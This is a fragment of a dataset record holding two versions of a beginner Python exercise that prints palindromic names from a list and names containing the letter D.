"step-3": "data = (\n ' Ramya , Deepa,LIRIL ,amma, dad, Kiran, 12321 , Suresh, Jayesh, Ramesh,Balu'\n )\nlst = data.split(',')\nfor name in lst:\n name = name.strip().upper()\n rname = name[::-1]\n if name == rname:\n print(name)\ngirlsdata = 'Tanvi,Dhatri,Haadya,Deepthi,Deepa,Ramya'\nprint('-' * 20)\nnames = girlsdata.split(',')\nfor name in names:\n name = name.upper()\n if 'D' in name:\n print(name)\n",
"step-4": "data = \" Ramya , Deepa,LIRIL ,amma, dad, Kiran, 12321 , Suresh, Jayesh, Ramesh,Balu\"\n\nlst = data.split(\",\")\n\nfor name in lst:\n name = name.strip().upper()\n rname = name[::-1]\n if name == rname:\n print(name)\n\ngirlsdata = \"Tanvi,Dhatri,Haadya,Deepthi,Deepa,Ramya\"\n# Name which start with DEE get those name\nprint(\"-\"*20)\nnames = girlsdata.split(\",\")\nfor name in names:\n name = name.upper()\n if \"D\" in name:\n print(name)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.